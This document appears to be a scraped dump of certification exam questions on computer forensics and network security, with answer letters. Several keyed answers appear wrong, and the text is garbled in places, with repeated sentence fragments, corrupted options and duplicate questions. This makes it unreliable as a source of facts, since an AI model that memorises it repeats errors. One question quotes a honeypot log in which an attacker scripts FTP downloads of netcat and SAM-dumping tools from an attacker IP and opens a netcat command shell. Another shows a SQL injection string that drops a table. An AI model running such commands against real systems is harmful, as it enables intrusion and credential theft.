QUESTION 411 Why would a company issue a dongle with the software they sell? A. To provide source code protection B. To provide wireless functionality with the software C. To provide copyright protection D. To ensure that keyloggers cannot be used

Answer: C

QUESTION 209 Davidson Trucking is a small transportation company that has three local offices in Detroit Michigan. Ten female employees that work for the company have gone to an attorney reporting that male employees repeatedly harassed them and that management did nothing to stop the problem. Davidson has employee policies that outline all company guidelines, including awareness on harassment and how it will not be tolerated. When the case is brought to court, whom should the prosecuting attorney call upon for not upholding company policy? A. IT personnel B. Employees themselves C. Supervisors D. Administrative assistant in charge of writing policies

Answer: C

QUESTION 21 If a file (readme.txt) on a hard disk has a size of 2600 bytes, how many sectors are normally allocated to this file? A. 4 Sectors B. 5 Sectors C. 6 Sectors D. 7 Sectors

Answer: C

QUESTION 210 When carrying out a forensics investigation, why should you never delete a partition on a dynamic disk? A. All virtual memory will be deleted B. The wrong partition may be set to active C. This action can corrupt the disk D. The computer will be set in a constant reboot state

Answer: C

QUESTION 215 What technique is used by JPEGs for compression? A. ZIP B. TCD C. DCT D. TIFF-8

Answer: C

QUESTION 231 When should an MD5 hash check be performed when processing evidence? A. After the evidence examination has been completed B. On an hourly basis during the evidence examination C. Before and after evidence examination D. Before the evidence examination has been completed

Answer: C

QUESTION 233 What file is processed at the end of a Windows XP boot to initialize the logon dialog box? A. NTOSKRNL.EXE B. NTLDR C. LSASS.EXE D. NTDETECT.COM

Answer: C

QUESTION 235 In the context of file deletion process, which of the following statement holds true? A. When files are deleted, the data is overwritten and the cluster marked as available B. The longer a disk is in use, the less likely it is that deleted files will be overwritten C. While booting, the machine may create temporary files that can delete evidence D. Secure delete programs work by completely overwriting the file in one go

Answer: C

QUESTION 236 What advantage does the tool Evidor have over the built-in Windows search? A. It can find deleted files even after they have been physically removed B. It can find bad sectors on the hard drive C. It can search slack space D. It can find files hidden within ADS

Answer: C

QUESTION 245 To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What group is actively providing tools and creating procedures for testing and validating computer forensics software ? A. Computer Forensics Tools and Validation Committee (CFTVC) B. Association of Computer Forensics Software Manufactures (ACFSM) C. National Institute of Standards and Technology (NIST) D. Society for Valid Forensics Tools and Testing (SVFTT)

Answer: C

QUESTION 249 Microsoft Outlook maintains email messages in a proprietary format in what type of file? A. .email B. .mail C. .pst D. .doc

Answer: C

QUESTION 253 Kyle is performing the final testing of an application he developed for the accounting department. His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command. What is he testing at this point? #include #include int main(int argc, char *argv[]) { char buffer[10]; if (argc < 2) { fprintf (stderr, "USAGE: %s string\n", argv[0]); return 1; } strcpy(buffer, argv[1]); return 0; } A. SQL injection B. Format string bug C. Buffer overflow D. Kernal injection

Answer: C

QUESTION 256 Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow FTP-PUT. Which firewall would be most appropriate for Harold? needs? A. Packet filtering firewall B. Circuit-level proxy firewall C. Application-level proxy firewall D. Data link layer firewall

Answer: C

QUESTION 268 During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore you report this evidence. This type of evidence is known as: A. Inculpatory evidence B. mandatory evidence C. exculpatory evidence D. Terrible evidence

Answer: C

QUESTION 269 While working for a prosecutor, What do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense ? A. Keep the information of file for later review B. Destroy the evidence C. Bring the information to the attention of the prosecutor, his or her supervisor or finally to the judge D. Present the evidence to the defense attorney

Answer: C

QUESTION 273 A forensics investigator needs to copy data from a computer to some type of removable media so he can examine the information at another location. The problem is that the data is around 42GB in size. What type of removable media could the investigator use? A. Blu-Ray single-layer B. HD-DVD C. Blu-Ray dual-layer D. DVD-18

Answer: C

QUESTION 275 After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a large organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts responds to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping sweep only produce a few responses? A. Only IBM AS/400 will reply to this scan B. Only Windows systems will reply to this scan C. Only Unix and Unix-like systems will reply to this scan D. A switched network will not respond to packets sent to the broadcast address

Answer: C

QUESTION 278 When operating systems mark a cluster as used but not allocated, the cluster is considered as _________ A. Corrupt B. Bad C. Lost D. Unallocated

Answer: C

QUESTION 279 Where is the startup configuration located on a router? A. Static RAM B. BootROM C. NVRAM D. Dynamic RAM

Answer: C

QUESTION 281 If you come across a sheepdip machine at your client site, what would you infer? A. A sheepdip coordinates several honeypots B. A sheepdip computer is another name for a honeypot C. A sheepdip computer is used only for virus-checking. D. A sheepdip computer defers a denial of service attack

Answer: C

QUESTION 285 You are the security analyst working for a private company out of France. Your current assignment is to obtain credit card information from a Swiss bank owned by that company. After initial reconnaissance, you discover that the bank security defenses are very strong and would take too long to penetrate. You decide to get the information by monitoring the traffic between the bank and one of its subsidiaries in London. After monitoring some of the traffic, you see a lot of FTP packets traveling back and forth. You want to sniff the traffic and extract usernames and passwords. What tool could you use to get this information? A. Snort B. Airsnort C. Ettercap D. RaidSniff

Answer: C

QUESTION 286 If an attacker's computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response? A. 31402 B. The zombie will not send a response C. 31401 D. 31399

Answer: C

QUESTION 287 In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case? A. evidence must be handled in the same way regardless of the type of case B. evidence procedures are not important unless you work for a law enforcement agency C. evidence in a criminal case must be secured more tightly than in a civil case D. evidence in a civil case must be secured more tightly than in a criminal case

Answer: C

QUESTION 292 George is a senior security analyst working for a state agency in Florida. His state's congress just passed a bill mandating every state agency to undergo a security audit annually. After learning what will be required, George needs to implement an IDS as soon as possible before the first audit occurs. The state bill requires that an IDS with a "time- based induction machine" be used. What IDS feature must George implement to meet this requirement? A. Pattern matching B. Statistical-based anomaly detection C. Real-time anomaly detection D. Signature-based anomaly detection

Answer: C

QUESTION 313 What will the following Linux command accomplish? dd if=/dev/mem of=/home/sam/mem.bin bs=1024 A. Copy the master boot record to a file B. Copy the contents of the system folder em?to a fileCopy the contents of the system folder ?em?to a file C. Copy the running memory to a file D. Copy the memory dump file to an image file

Answer: C

QUESTION 320 You are contracted to work as a computer forensics investigator for a regional bank that has four 30 TB storage area networks that store customer data. What method would be most efficient for you to acquire digital evidence from this network? A. Make a bit-stream disk-to-disk file B. Make a bit-stream disk-to-image file C. Create a sparse data copy of a folder or file D. Create a compressed copy of the file with DoubleSpace

Answer: C

QUESTION 323 What operating system would respond to the following command? C:\> nmap -sW 10.10.145.65 A. Windows XP B. Mac OS X C. FreeBSD D. Windows 95

Answer: C

QUESTION 326 Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM file on a computer. Where should Harold navigate on the computer to find the file? A. %systemroot%\LSA B. %systemroot%\system32\drivers\etc C. %systemroot%\repair D. %systemroot%\system32\LSA

Answer: C

QUESTION 335 How many possible sequence number combinations are there in TCP/IP protocol? A. 320 billion B. 1 billion C. 4 billion D. 32 million

Answer: C

QUESTION 336 Which of the following is NOT a graphics file? A. Picture1.tga B. Picture2.bmp C. Picture3.nfo D. Picture4.psd

Answer: C

QUESTION 337 When investigating a computer forensics case where Microsoft Exchange and Blackberry Enterprise server are used, where would investigator need to search to find email sent from a Blackberry device? A. RIM Messaging center B. Blackberry Enterprise server C. Microsoft Exchange server D. Blackberry desktop redirector

Answer: C

QUESTION 347 What does the superblock in Linux define? A. file synames B. disk geometr C. location of the first inode D. available space

Answer: C

QUESTION 348 Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking languages. What networking protocol language should she learn that routers utilize? A. BPG B. ATM C. OSPF D. UDP

Answer: C

QUESTION 349 An "idle" system is also referred to as what? A. PC not connected to the Internet B. PC not being used C. Zombie D. Bot

Answer: C

QUESTION 353 From the following spam mail header, identify the host IP that sent this spam? From [email protected] [email protected] Tue Nov 27 17:27:11 2001 Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT) Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT) Message-Id: >[email protected] From: "china hotel web" To: "Shlam" Subject: SHANGHAI (HILTON HOTEL) PACKAGE Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0 X-Priority: 3 X-MSMailPriority: Normal Reply-To: "china hotel web" A. 137.189.96.52 B. 8.12.1.0 C. 203.218.39.20 D. 203.218.39.50

Answer: C

QUESTION 37 Computer forensics report provides detailed information on complete computer forensics investigation process. It should explain how the incident occurred, provide technical details of the incident and should be clear to understand. Which of the following attributes of a forensics report can render it inadmissible in a court of law? A. It includes metadata about the incident B. It includes relevant extracts referred to In the report that support analysis or conclusions C. It is based on logical assumptions about the incident timeline D. It maintains a single document style throughout the text

Answer: C

QUESTION 413 Melanie was newly assigned to an investigation and asked to make a copy of all the evidence from the compromised system. Melanie did a DOS copy of all the files on the system. What would be the primary reason for you to recommend a disk imaging tool? A. A disk imaging tool would check for CRC32s for internal self checking and validation and have MD5 checksum B. Evidence file format will contain case data entered by the examiner and encrypted at the beginning of the evidence file C. A simple DOS copy will not include deleted files, file slack and other information D. There is no case for an imaging tool as it will use a closed, proprietary format that if compared to the original will not match up sector for sector

Answer: C

QUESTION 370 You are working as Computer Forensics investigator and are called by the owner of an accounting firm to investigate possible computer abuse by one of the firm's employees. You meet with the owner of the firm and discover that the company has never published a policy stating that they reserve the right to inspect their computing assets at will. What do you do? A. Inform the owner that conducting an investigation without a policy is not a problem because the company is privately owned B. Inform the owner that conducting an investigation without a policy is a violation of the 4th amendment C. Inform the owner that conducting an investigation without a policy is a violation of the employees' expectation of privacy D. Inform the owner that conducting an investigation without a policy is not a problem because a policy is only necessary for government agencies

Answer: C

QUESTION 373 When investigating a Windows System, it is important to view the contents of the page or swap file because: A. Windows stores all of the systems configuration information in this file B. This is file that windows use to communicate directly with Registry C. A Large volume of data can exist within the swap file of which the computer user has no knowledge D. This is the file that windows use to store the history of the last 100 commands that were run from the command line

Answer: C

QUESTION 377 What is a good security method to prevent unauthorized users from "tailgating"? A. Pick-resistant locks B. Electronic key systems C. Man trap D. Electronic combination locks

Answer: C

QUESTION 38 A forensic investigator is a person who handles the complete Investigation process, that is, the preservation, identification, extraction, and documentation of the evidence. The investigator has many roles and responsibilities relating to the cybercrime analysis. The role of the forensic investigator is to: A. Take permission from all employees of the organization for investigation B. Harden organization network security C. Create an image backup of the original evidence without tampering with potential evidence D. Keep the evidence a highly confidential and hide the evidence from law enforcement agencies

Answer: C

QUESTION 384 When a router receives an update for its routing table, what is the metric value change to that path? A. Increased by 2 B. Decreased by 1 C. Increased by 1 D. Decreased by 2

Answer: C

QUESTION 388 You have used a newly released forensic investigation tool, which doesn't meet the Daubert Test, during a case. The case has ended-up in court. What argument could the defense make to weaken your case? A. The tool hasn't been tested by the International Standards Organization (ISO) B. Only the local law enforcement should use the tool C. The total has not been reviewed and accepted by your peers D. You are not certified for using the tool

Answer: C

QUESTION 391 A packet is sent to a router that does not have the packet destination address in its route table, how will the packet get to its properA packet is sent to a router that does not have the packet? destination address in its route table, how will the packet get to its proper destination? A. Border Gateway Protocol B. Root Internet servers C. Gateway of last resort D. Reverse DNS

Answer: C

QUESTION 392 An employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the employee computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to astored on the employee? computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the employee before he leaves the building and recover the floppy disk and secure his computer. Will you be able to break the encryption so that you can verify that the employee was in possession of the proprietary information? A. EFS uses a 128-bit key that cannot be cracked, so you will not be able to recover the information B. The EFS Revoked Key Agent can be used on the computer to recover the information C. When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information D. When the encrypted file was copied to the floppy disk, the EFS private key was also copied to the floppy disk, so you can recover the information

Answer: C

QUESTION 396 After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, statefull firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet. Why is that? A. IPSEC does not work with packet filtering firewalls B. Statefull firewalls do not work with packet filtering firewalls C. NAT does not work with IPSEC D. NAT does not work with statefull firewalls

Answer: C

QUESTION 404 It takes _____________ mismanaged case/s to ruin your professional reputation as a computer forensics examiner? A. by law, three B. quite a few C. only one D. at least two

Answer: C

QUESTION 405 You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company clients. You have rummaged through their trash and found very little information. You do not want to set off any alarms on their network, so you plan on performing passive footprinting against their Web servers. What tool should you use? A. Dig B. Ping sweep C. Netcraft D. Nmap

Answer: C

QUESTION 408 Julie is a college student majoring in Information Systems and Computer Science. She is currently writing an essay for her computer crimes class. Julie paper focuses on white- collar crimes in America and how forensics investigators investigate the cases. Julie would like to focus the subjectJulie? paper focuses on white-collar crimes in America and how forensics investigators investigate the cases. Julie would like to focus the subject of the essay on the most common type of crime found in corporate America. What crime should Julie focus on? A. Physical theft B. Copyright infringement C. Industrial espionage D. Denial of Service attacks

Answer: C

QUESTION 409 Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately. Which organization coordinates computer crimes investigations throughout the United States? A. Internet Fraud Complaint Center B. Local or national office of the U.S. Secret Service C. National Infrastructure Protection Center D. CERT Coordination Center

Answer: C

QUESTION 440 As a security analyst you setup a false survey website that will reQuire users to create a username and a strong password. You send the link to all the employees of the company. What information will you be able to gather? A. The IP address of the employees computers B. Bank account numbers and the corresponding routing numbers C. The employees network usernames and passwords D. The MAC address of theemployees?computers

Answer: C

QUESTION 442 Sniffers that place NICs in promiscuous mode work at what layer of the OSI model? A. Network B. Transport C. Physical D. Data Link

Answer: C

QUESTION 443 A state department site was recently attacked and all the servers had their disks erased. The incident response team sealed the area and commenced investigation. During evidence collection they came across a zip disks that did not have the standard labeling on it. The incident team ran the disk on an isolated system and found that the system disk was accidentally erased. They decided to call in the FBI for further investigation. Meanwhile, they short listed possible suspects including three summer interns. Where did the incident team go wrong? A. They examined the actual evidence on an unrelated system B. They attempted to implicate personnel without proof C. They tampered with evidence by using it D. They called in the FBI without correlating with the fingerprint data

Answer: C

QUESTION 451 You have been asked to investigate after a user has reported a threatening e-mail they have received from an external source. Which of the following are you most interested in when trying to trace the source of the message? A. The X509 Address B. The SMTP reply Address C. The E-mail Header D. The Host Domain Name

Answer: C

QUESTION 452 You are assisting a Department of Defense contract company to become compliant with the stringent security policies set by the DoD. One such strict rule is that firewalls must only allow incoming connections that were first initiated by internal computers. What type of firewall must you implement to abide by this policy? A. Packet filtering firewall B. Application-level proxy firewall C. Statefull firewall D. Circuit-level proxy firewall

Answer: C

QUESTION 453 Why are Linux/Unix based computers better to use than Windows computers for idle scanning? A. Windows computers will not respond to idle scans B. Linux/Unix computers are easier to compromise C. Windows computers are constantly talking D. Linux/Unix computers are constantly talking

Answer: C

QUESTION 458 When setting up a wireless network with multiple access points, why is it important to set each access point on a different channel? A. Avoid over-saturation of wireless signals B. So that the access points will work on different requencies C. Avoid cross talk D. Multiple access points can be set up on the same channel without any issues

Answer: C

QUESTION 460 Michael works for Kimball Construction Company as senior security analyst. As part of yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts XMAS scan and most of the ports scanned do not give a response. In what state are these ports? A. Filtered B. Closed C. Open D. Stealth

Answer: C

QUESTION 464 You are working for a large clothing manufacturer as a computer forensics investigator and are called in to investigate an unusual case of an employee possibly stealing clothing designs from the company and selling them under a different brand name for a different company. What you discover during the course of the investigation is that the clothing designs are actually original products of the employee and the company has no policy against an employee selling his own designs on his own time. The only thing that you can find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as that of the company with only the wording in the graphic being different. What area of the law is the employee violating? A. Copyright law B. Brandmark law C. Trademark law D. Printright law

Answer: C

QUESTION 468 Julia is a senior security analyst for Berber Consulting group. She is currently working on a contract for a small accounting firm in Florida. They have given her permission to perform social engineering attacks on the company to see if their in-house training did any good. Julia calls the main number for the accounting firm and talks to the receptionist. Julia says that she is an IT technician from the company's main office in Iowa. She states that she needs the receptionist's network username and password to troubleshoot a problem they are having. Julia says that Bill Hammond, the CEO of the company, reQuested this information. After hearing the name of the CEO, the receptionist gave Julia all the information she asked for. What principal of social engineering did Julia use? A. Social Validation B. Friendship/Liking C. Reciprocation D. Scarcity

Answer: C

QUESTION 469 You are working as a computer forensics investigator for a corporation on a computer abuse case. You discover evidence that shows the subject of your investigation is also embezzling money from the company. The company CEO and the corporate legal counsel advise you to contact local law enforcement and provide them with the evidence that you have found. The law enforcement officer that responds requests that you put a network sniffer on your network and monitor all traffic to the subject computer. You inform the officer that you will not be able to comply with thatnetwork sniffer on your network and monitor all traffic to the subject? computer. You inform the officer that you will not be able to comply with that request because doing so would: A. Violate your contract B. Cause network congestion C. Make you an agent of law enforcement D. Write information to the subject hard driveWrite information to the subject? hard drive

Answer: C

QUESTION 47 Ever-changing advancement or mobile devices increases the complexity of mobile device examinations. Which or the following is an appropriate action for the mobile forensic investigation? A. To avoid unwanted interaction with devices found on the scene, turn on any wireless interfaces such as Bluetooth and Wi-Fi radios B. Do not wear gloves while handling cell phone evidence to maintain integrity of physical evidence C. If the device's display is ON. the screen's contents should be photographed and, if necessary, recorded manually, capturing the time, service status, battery level, and other displayed icons D. If the phone is in a cradle or connected to a PC with a cable, then unplug the device from the computer

Answer: C

QUESTION 473 When should an MD5 hash check be performed when processing evidence? A. After the evidence examination has been completed B. On an hourly basis during the evidence examination C. Before and after evidence examination D. Before the evidence examination has been completed

Answer: C

QUESTION 489 Smith, an employee of a reputed forensic Investigation firm, has been hired by a private organization to investigate a laptop that is suspected to be involved in hacking of organization DC server. Smith wants to find all the values typed into the Run box in the Start menu. Which of the following registry key Smith will check to find the above information? A. UserAssist Key B. MountedDevices key C. RunMRU key D. TypedURLs key

Answer: C

QUESTION 7 Which of the following standard is based on a legal precedent regarding the admissibility of scientific examinations or experiments in legal cases? A. Daubert Standard B. Schneiderman Standard C. Frye Standard D. FERPA standard

Answer: C

QUESTION 83 Which of the following statements does not support the case assessment? A. Review the case investigator's request for service B. Identify the legal authority for the forensic examination request C. Do not document the chain of custody D. Discuss whether other forensic processes need to be performed on the evidence

Answer: C

QUESTION 444 This is the original file structure database that Microsoft originally designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive. A. Master Boot Record (MBR) B. Master File Table (MFT) C. File Allocation Table (FAT) D. Disk Operating System (DOS)

Answer: C Explanation: A MBR is usually found on fixed disks, not floppy. A MFT is part of NTFS, and NTFS is not used on floppy DOS is an operating system, not a file structure database

QUESTION 346 A law enforcement officer may only search for and seize criminal evidence with _______________________, which are facts or circumstances that would lead a reasonable person to believe a crime has been committed or is about to be committed, evidence of the specific crime exists and the evidence of the specific crime exists at the place to be searched. A. Mere Suspicion B. A preponderance of the evidence C. Probable cause D. Beyond a reasonable doubt

Answer: C Explanation: A preponderance of the evidence is the proof requirement in a civil case Beyond a reasonable doubt is the proof requirement in a criminal case

QUESTION 446 How many sectors will a 125 KB file use in a FAT32 file system? A. 32 B. 16 C. 250 D. 25

Answer: C Explanation: If you assume that we are using 512 bytes sectors, then 125x1024/512 = 250 sectors would be needed. Actually, this is the same for a FAT16 file system as well.

QUESTION 325 The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given? A. It is a local exploit where the attacker logs in using username johna2k B. There are two attackers on the system ?johna2k and haxedj00 C. The attack is a remote exploit and the hacker downloads three files D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Answer: C Explanation: The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct Answer is C.

QUESTION 421 What will the following command produce on a website login page? SELECT email, passwd, login_id, full_name FROM members WHERE email = '[email protected]'; DROP TABLE members; --' A. Retrieves the password for the first user in the members table B. This command will not produce anything since the syntax is incorrect C. Deletes the entire members table D. Inserts the Error! Reference source not found. email address into the members table

Answer: C Explanation: The third line deletes the table named members.

QUESTION 164 A mobile operating system manages communication between the mobile device and other compatible devices like computers, televisions, or printers. Which mobile operating system architecture is represented here? A. webOS System Architecture B. Symbian OS Architecture C. Android OS Architecture D. Windows Phone 7 Architecture

Answer: C Topic 2, Exam Set B

QUESTION 108 Which is not a part of environmental conditions of a forensics lab? A. Large dimensions of the room B. Good cooling system to overcome excess heat generated by the work station C. Allocation of workstations as per the room dimensions D. Open windows facing the public road

Answer: D

QUESTION 111 Which of the following is not correct when documenting an electronic crime scene? A. Document the physical scene, such as the position of the mouse and the location of components near the system B. Document related electronic components that are difficult to find C. Record the condition of the computer system, storage media, electronic devices and conventional evidence, including power status of the computer D. Write down the color of shirt and pant the suspect was wearing

Answer: D

QUESTION 117 Which of the following statements is incorrect when preserving digital evidence? A. Document the actions and changes that you observe in the monitor, computer, printer, or in other peripherals B. Verily if the monitor is in on, off, or in sleep mode C. Remove the power cable depending on the power state of the computer i.e., in on. off, or in sleep mode D. Turn on the computer and extract Windows event viewer log files

Answer: D

QUESTION 12 Which of the following is not a part of disk imaging tool requirements? A. The tool should not change the original content B. The tool should log I/O errors in an accessible and readable form, including the type and location of the error C. The tool must have the ability to be held up to scientific and peer review D. The tool should not compute a hash value for the complete bit stream copy generated from an image file of the source

Answer: D

QUESTION 401 What is the name of the standard Linux command that can be used to create bit-stream images? A. mcopy B. image C. MD5 D. dd

Answer: D

QUESTION 151 The IIS log file format is a fixed (cannot be customized) ASCII text-based format. The IIS format includes basic items, such as client IP address, user name, date and time, service and instance, server name and IP address, request type, target of operation, etc. Identify the service status code from the following IIS log. 192.168.100.150, -, 03/6/11, 8:45:30, W3SVC2, SERVER, 172.15.10.30, 4210, 125, 3524, 100, 0, GET, /dollerlogo.gif, A. W3SVC2 B. 4210 C. 3524 D. 100

Answer: D

QUESTION 161 Which of the following statement is not correct when dealing with a powered-on computer at the crime scene? A. If a computer is switched on and the screen is viewable, record the programs running on screen and photograph the screen B. If a computer is on and the monitor shows some picture or screen saver, move the mouse slowly without depressing any mouse button and take a photograph of the screen and record the information displayed C. If a monitor is powered on and the display is blank, move the mouse slowly without depressing any mouse button and take a photograph D. If the computer is switched off. power on the computer to take screenshot of the desktop

Answer: D

QUESTION 167 Paraben Lockdown device uses which operating system to write hard drive data?Paraben? Lockdown device uses which operating system to write hard drive data? A. Mac OS B. Red Hat C. Unix D. Windows

Answer: D

QUESTION 17 Which of the following statements is not a part of securing and evaluating electronic crime scene checklist? A. Locate and help the victim B. Transmit additional flash messages to other responding units C. Request additional help at the scene if needed D. Blog about the incident on the internet

Answer: D

QUESTION 172 What hashing method is used to password protect Blackberry devices? A. AES B. RC5 C. MD5 D. SHA-1

Answer: D

QUESTION 173 Paul is a computer forensics investigator working for Tyler & Company Consultants. Paul has been called upon to help investigate a computer hacking ring broken up by the local police. Paul begins to inventory the PCs found in the hackers?hideout. Paul then comes across a PDA left by them that is attached to a number of different peripheral devices. What is the first step that Paul must take with the PDA to ensure the integrity of the investigation? A. Place PDA, including all devices, in an antistatic bag B. Unplug all connected devices C. Power off all devices if currently on D. Photograph and document the peripheral devices

Answer: D

QUESTION 177 What type of equipment would a forensics investigator store in a StrongHold bag? A. PDAPDA? B. Backup tapes C. Hard drives D. Wireless cards

Answer: D

QUESTION 180 With regard to using an antivirus scanner during a computer forensics investigation, you should: A. Scan the suspect hard drive before beginning an investigation B. Never run a scan on your forensics workstation because it could change your system configurationNever run a scan on your forensics workstation because it could change your system? configuration C. Scan your forensics workstation at intervals of no more than once every five minutes during an investigation D. Scan your forensics workstation before beginning an investigation

Answer: D

QUESTION 186 When marking evidence that has been collected with the aa/ddmmyy/nnnn/zz format, what does the nnn denote? A. The year the evidence was taken B. The sequence number for the parts of the same exhibit C. The initials of the forensics analyst D. The sequential number of the exhibits seized

Answer: D

QUESTION 191 What is the CIDR from the following screenshot? A. /24A./24A./24 B. /32B./32B./32 C. /16C./16C./16 D. /8D./8D./8

Answer: D

QUESTION 193 How often must a company keep log files for them to be admissible in a court of law? A. All log files are admissible in court no matter their frequency B. Weekly C. Monthly D. Continuously

Answer: D

QUESTION 194 When needing to search for a website that is no longer present on the Internet today but was online few years back, what site can be used to view the website collection of pages?view the website? collection of pages? A. Proxify.net B. Dnsstuff.com C. Samspade.org D. Archive.org

Answer: D

QUESTION 195 When using an iPod and the host computer is running Windows, what file system will be used? A. iPod+ B. HFS C. FAT16 D. FAT32

Answer: D

QUESTION 197 Travis, a computer forensics investigator, is finishing up a case he has been working on for over a month involving copyright infringement and embezzlement. His last task is to prepare an investigative report for the president of the company he has been working for. Travis must submit a hard copy and an electronic copy to this president. In what electronic format should Travis send this report? A. TIFF-8 B. DOC C. WPD D. PDF

Answer: D

QUESTION 202 A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. Why would this not be recommended? A. Searching for evidence themselves would not have any ill effects B. Searching could possibly crash the machine or device C. Searching creates cache files, which would hinder the investigation D. Searching can change date/time stamps

Answer: D

QUESTION 204 Under confession, an accused criminal admitted to encrypting child pornography pictures and then hiding them within other pictures. What technique did the accused criminal employ? A. Typography B. Steganalysis C. Picture encoding D. Steganography

Answer: D

QUESTION 205 What happens when a file is deleted by a Microsoft operating system using the FAT file system? A. The file is erased and cannot be recovered B. The file is erased but can be recovered partially C. A copy of the file is stored and the original file is erased D. Only the reference to the file is removed from the FAT and can be recovered

Answer: D

QUESTION 217 The efforts to obtain information before a trial by demanding documents, depositions, ;QUESTIONs and Answers written under oath, written requests for admissions of fact, and examination of the scene is a description of what legal term? A. Detection B. Hearsay C. Spoliation D. Discovery

Answer: D

QUESTION 402 The objective of this act was to protect consumers personal financial information held by financial institutions and their service providers. A. HIPAA B. Sarbanes-Oxley 2002 C. California SB 1386 D. Gramm-Leach-Bliley Act

Answer: D

QUESTION 218 John is working as a computer forensics investigator for a consulting firm in Canada. He is called to seize a computer at a local web caf?John is working as a computer forensics investigator for a consulting firm in Canada. He is called to seize a computer at a local web caf purportedly used as a botnet server. John thoroughly scans the computer and finds nothing that would lead him to think the computer was a botnet server. John decides to scan the virtual memory of the computer to possibly find something he had missed. What information will the virtual memory scan produce? A. It contains the times and dates of when the system was last patched B. It is not necessary to scan the virtual memory of a computer C. It contains the times and dates of all the system files D. Hidden running processes

Answer: D

QUESTION 220 In the following directory listing, which file should be used to restore archived email messages for someone using Microsoft Outlook? A. Outlook bak B. Outlook ost C. Outlook NK2 D. Outlook pst

Answer: D

QUESTION 255 Where are files temporarily written in Unix when printing? A. /usr/spool B. /var/print C. /spool D. /var/spool

Answer: D

QUESTION 263 Which of the following refers to the data that might still exist in a cluster even though the original file has been overwritten by another file? A. Sector B. Metadata C. MFT D. Slack Space

Answer: D

QUESTION 264 What binary coding is used most often for e-mail purposes? A. SMTP B. Uuencode C. IMAP D. MIME

Answer: D

QUESTION 266 You are a computer forensics investigator working with local police department and you are called to assist in an investigation of threatening emails. The complainant has printed out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the _________________________ in order to track the emails back to the suspect. A. Routing Table B. Firewall log C. Configuration files D. Email Header

Answer: D

QUESTION 298 You just passed your ECSA exam and are about to start your first consulting job running security audits for a financial institution in Los Angeles. The IT manager of the company you will be working for tries to see if you remember your ECSA class. He asks about the methodology you will be using to test the company's network. How would you Answer? A. IBM Methodology B. Microsoft Methodology C. Google Methodology D. LPT Methodology

Answer: D

QUESTION 3 Which of the following statements is incorrect related to acquiring electronic evidence at crime scene? A. Sample banners are used to record the system activities when used by the unauthorized user B. In warning banners, organizations give clear and unequivocal notice to intruders that by signing onto the system they are expressly consenting to such monitoring C. The equipment is seized which is connected to the case, knowing the role of the computer which will indicate what should be taken D. At the time of seizing process, you need to shut down the computer immediately

Answer: D

QUESTION 301 The MD5 program is used to: A. wipe magnetic media before recycling it B. make directories on a evidence disk C. view graphics files on an evidence drive D. verify that a disk is not altered when you examine it

Answer: D

